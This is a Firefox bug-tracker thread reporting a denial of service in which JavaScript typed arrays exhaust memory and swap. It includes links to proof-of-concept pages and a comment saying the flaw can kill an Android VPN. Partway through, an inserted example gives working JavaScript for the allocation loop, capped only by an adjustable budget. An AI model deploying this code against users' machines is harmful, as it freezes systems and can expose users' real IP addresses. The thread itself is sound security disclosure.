Bug 1463833
Opened 7 years ago
Updated 2 years ago
Denial of service with JS typed arrays (memory exhaustion / swap)
Categories
(Core :: JavaScript Engine, defect, P3)
Tracking
UNCONFIRMED
People
(Reporter: brion, Unassigned)
References
(Blocks 1 open bug)
Details
(Keywords: crash, csectype-dos, testcase, Whiteboard: [sg:dos])
Attachments
(1 file: 475 bytes, text/plain)
User Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.13; rv:60.0) Gecko/20100101 Firefox/60.0
Build ID: 20180516032328
Steps to reproduce:
Load https://brionv.com/misc/crash/ (source attached)
This page allocates a 64MB typed array, fills it with data, saves a reference to it in an array, and then repeats at the next timer tick. This simulates a malicious or miscoded JavaScript widget or plugin allocating memory quickly and never freeing it.
Actual results:
On Linux desktop with 12GB RAM and spinning HDD, system becomes almost instantly unresponsive as it goes into "swap hell", and must be rebooted to recover.
On MacBook Pro with 16GB RAM and fast SSD, content process balloons up to and beyond 64GB, with swap usage over 20GB before I manually close it out (the memory compresses well so swap usage is smaller than the total allocation). System is slower but can still control it for at least a few seconds while watching RAM usage go up...
Expected results:
Loading the page in Safari on the MacBook Pro, memory usage gets up to around 20 GB and then the browser closes the content process and reloads the page. Swap usage remains reasonable and the machine remains responsive.
Edge in a Windows 10 VM also seems to abort the content process and reload the page at an amount near the total available memory.
At Wikimedia I'm doing research on user-supplied "plugins" or "widgets" that would combine HTML or SVG content with sandboxed JS scripting, using some combination of iframes/workers/CSP to lock the scripts away from the main page context. A system-level denial of service in trivial JavaScript means we can't rely on loading such plugin scripts automatically as it would make it much more difficult for people to fix or remove a misbehaving or malicious plugin.
Note there are related older bugs in bugzilla such as:
* https://bugzilla.mozilla.org/show_bug.cgi?id=607575 - memory denial of service through appending to document.title
* https://bugzilla.mozilla.org/show_bug.cgi?id=609358 - memory denial of service through document.write
Though those are DOM-related, and this technique should work fine without a DOM (such as in a Worker).
If you don't feel it's a security issue, feel free to reclassify the bug as public.
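The allocation pattern the report describes, reconstructed as an added example. This is not the reporter's attached PoC (the source at the URL above), and the `maxBytes` budget is an assumption introduced here so the loop stops instead of driving the host into swap; the loop in the report has no cap.

```javascript
// Added example: a bounded re-creation of the allocation pattern the report
// describes. It is not the reporter's attached PoC. The `maxBytes` budget is
// an assumption introduced here so the loop stops instead of exhausting
// memory; the report's loop has no such cap.

const MiB = 1024 * 1024;

// Allocate one typed array, write every byte so the pages are actually
// committed (an untouched zero-filled buffer may stay reserved but unbacked
// until first touch), and retain a reference so the GC cannot reclaim it.
function allocateChunk(retained, chunkBytes) {
  const chunk = new Uint8Array(chunkBytes);
  chunk.fill(0xff); // a constant fill compresses well, as the report observes on macOS
  retained.push(chunk);
  return chunk.byteLength;
}

// Synchronous form: keep allocating until the next chunk would exceed the
// budget. Returns the accounting so a caller can check what was retained.
function exhaustUpTo(maxBytes, chunkBytes) {
  const retained = [];
  let total = 0;
  while (total + chunkBytes <= maxBytes) {
    total += allocateChunk(retained, chunkBytes);
  }
  return { total, chunks: retained.length, retained };
}

// Timer-tick form, matching the report: one chunk per tick. Yielding between
// allocations keeps the page responsive while memory climbs, which is why
// the tab does not simply hang. Resolves once the budget is reached.
function exhaustOnTicks(maxBytes, chunkBytes, tickMs = 0) {
  return new Promise((resolve) => {
    const retained = [];
    let total = 0;
    const tick = () => {
      if (total + chunkBytes > maxBytes) {
        resolve({ total, chunks: retained.length, retained });
        return;
      }
      total += allocateChunk(retained, chunkBytes);
      setTimeout(tick, tickMs);
    };
    tick();
  });
}

// Stand-alone run with a deliberately small budget (8 MiB in 1 MiB chunks);
// the report's PoC used 64 MB chunks and no budget.
if (typeof module !== 'undefined' && require.main === module) {
  exhaustOnTicks(8 * MiB, 1 * MiB).then((r) =>
    console.log(`retained ${r.chunks} chunks, ${r.total / MiB} MiB total`));
}
```

Neither function touches the DOM, so the same code runs unchanged inside a Worker, which is the point made below about the technique not depending on a document. Only the budget and the `setTimeout` yield separate this from the behaviour in the report.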
Updated•7 years ago
Group: core-security → javascript-core-security
Comment 1•7 years ago
jkt: is this a dupe of any of the existing "eviltraps" DoS bugs? I know the JS team was reluctant to add quotas because different machines have different capabilities, but we should keep the machine alive enough to be able to close the offending tab.
Updated•6 years ago
Group: javascript-core-security
Comment 2•6 years ago
I'm not aware of this being a dupe. Clearing ni, sorry for the delay.
Flags: needinfo?(jkt)
Comment 4•4 years ago
I just stumbled upon this bug and found that it can be used to do far worse things, including killing the system VPN on Android and revealing the user's real IP address, if the kill switch is not enabled.
Check out this PoC, which is based on the original PoC of this bug: https://github.com/noarchwastaken/vpn_killer
Updated•2 years ago
Severity: normal → S3